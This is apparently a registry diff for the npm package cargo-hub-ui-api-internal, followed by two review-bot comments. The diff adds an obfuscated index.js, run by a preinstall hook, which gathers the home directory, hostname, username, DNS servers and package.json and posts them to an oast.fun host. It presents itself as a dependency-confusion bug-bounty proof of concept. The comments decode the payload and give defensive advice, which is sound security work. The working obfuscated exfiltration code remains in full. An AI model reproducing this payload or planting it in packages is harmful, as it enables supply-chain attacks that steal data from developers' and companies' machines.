cargo-hub-ui-api-internal 0.0.1-security → 420.6.10
Potentially problematic release.
This version of cargo-hub-ui-api-internal might be problematic. Click here for more details.
- package/README.md +1 -5
- package/index.js +1 -0
- package/package.json +9 -3
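--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +1 @@
-
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=cargo-hub-ui-api-internal for more information.
+This is a POC for the suspected dependency confusion vulnerability on a public bug bounty program. no malicious intentions.<3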
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
function _0x3155(){const _0xdc6e2f=['getServers','error','hostname','2928457uqlZvU','homedir','data','dns','name','5271264QcXWDB','10jyygWt','1055604IiIApu','stringify','30GnOOOU','version','userInfo','860172faofvj','request','179256oyJZrx','write','./package.json','___resolved','158DpBFoi','stdout','https','32631HQfCxP','end','22986WhsGfi'];_0x3155=function(){return _0xdc6e2f;};return _0x3155();}const _0x568ed7=_0x4a85;(function(_0x39ee5b,_0x456a05){const _0x34442f=_0x4a85,_0x200b10=_0x39ee5b();while(!![]){try{const _0x46c988=-parseInt(_0x34442f(0x146))/0x1+parseInt(_0x34442f(0x141))/0x2*(-parseInt(_0x34442f(0x144))/0x3)+parseInt(_0x34442f(0x13b))/0x4*(-parseInt(_0x34442f(0x135))/0x5)+-parseInt(_0x34442f(0x136))/0x6+parseInt(_0x34442f(0x14a))/0x7+-parseInt(_0x34442f(0x13d))/0x8+parseInt(_0x34442f(0x134))/0x9*(parseInt(_0x34442f(0x138))/0xa);if(_0x46c988===_0x456a05)break;else _0x200b10['push'](_0x200b10['shift']());}catch(_0x597465){_0x200b10['push'](_0x200b10['shift']());}}}(_0x3155,0xa24a7));const os=require('os'),dns=require(_0x568ed7(0x132)),querystring=require('querystring'),https=require(_0x568ed7(0x143)),packageJSON=require(_0x568ed7(0x13f)),package=packageJSON[_0x568ed7(0x133)],trackingData=JSON[_0x568ed7(0x137)]({'p':package,'c':__dirname,'hd':os[_0x568ed7(0x130)](),'hn':os[_0x568ed7(0x149)](),'un':os[_0x568ed7(0x13a)]()['username'],'dns':dns[_0x568ed7(0x147)](),'r':packageJSON[_0x568ed7(0x140)],'v':packageJSON[_0x568ed7(0x139)],'pjson':packageJSON}),postData=querystring[_0x568ed7(0x137)]({'msg':trackingData}),options={'hostname':'zpniztomtitltodxjeqzylllz4kndi51n.oast.fun','port':0x1bb,'path':'/','method':'POST','headers':{'Content-Type':'application/x-www-form-urlencoded','Content-Length':postData['length']}},req=https[_0x568ed7(0x13c)](options,_0x515ce3=>{const _0x5027f4=_0x568ed7;_0x515ce3['on'](_0x5027f4(0x131),_0x608996=>{const _0x5da248=_0x5027f4;process[_0x5da248(0x142)][_0x5da248(0x13e)](_0x608996);});});function 
_0x4a85(_0x1916c0,_0x5a33c3){const _0x3155a8=_0x3155();return _0x4a85=function(_0x4a8505,_0x3a58eb){_0x4a8505=_0x4a8505-0x130;let _0xd23e9c=_0x3155a8[_0x4a8505];return _0xd23e9c;},_0x4a85(_0x1916c0,_0x5a33c3);}req['on'](_0x568ed7(0x148),_0x8eadc0=>{const _0x403311=_0x568ed7;console[_0x403311(0x148)](_0x8eadc0);}),req[_0x568ed7(0x13e)](postData),req[_0x568ed7(0x145)]();
|
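Review bot: The one added line in package/index.js is obfuscated with a rotated string table, and decoding it shows the request body carries far more than an install confirmation: `os.homedir()`, `os.hostname()`, `os.userInfo().username`, `dns.getServers()`, `__dirname` and the whole parsed `package.json` are JSON-encoded into `msg` and POSTed to the hard-coded `oast.fun` subdomain on port `0x1bb` (443). That is at odds with the README's "no malicious intentions" wording, because nobody can see what leaves the machine without de-obfuscating the file first. The file should ship readable, send only what proves the install (for example `JSON.stringify({ p: package, v: packageJSON.version })`), and open with a comment such as `// Sends package name and version to <callback host>; nothing else is collected`. Anyone who resolved version 420.6.10 should treat the listed host details as disclosed and search DNS and proxy logs for the hostname set in `options`.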
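--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,12 @@
 {
 "name": "cargo-hub-ui-api-internal",
-"version": "
-"description": "
-"
+"version": "420.6.10",
+"description": "This package is a Proof of concept made by h0udini for the a bug bounty program. Its only function is to confirm installation on company machines, the code is not malicious in any way and will be deleted after getting the necessary POC.",
+"main": "index.js",
+"scripts": {
+"test": "echo \"greetings from h0udini!\" && exit 1",
+"preinstall": "node index.js"
+},
+"author": "h0udini@intigriti.me",
+"license": "ISC"
 }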
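Review bot: The `"preinstall": "node index.js"` entry makes npm execute index.js during `npm install`, before the package is ever imported, so merely resolving this name is enough to run the code. The jump from the `0.0.1-security` placeholder to `420.6.10` looks chosen so that a resolver consulting both a private and the public registry prefers this copy over an internal package with the same unscoped name; that is inferred from the README's dependency-confusion statement, not visible in the hunk. On the consuming side, internal packages should live under a scope bound to the private registry in `.npmrc` (e.g. `@<your-scope>:registry=<private registry URL>`), and CI installs should run with `--ignore-scripts` so lifecycle hooks like this one do not execute.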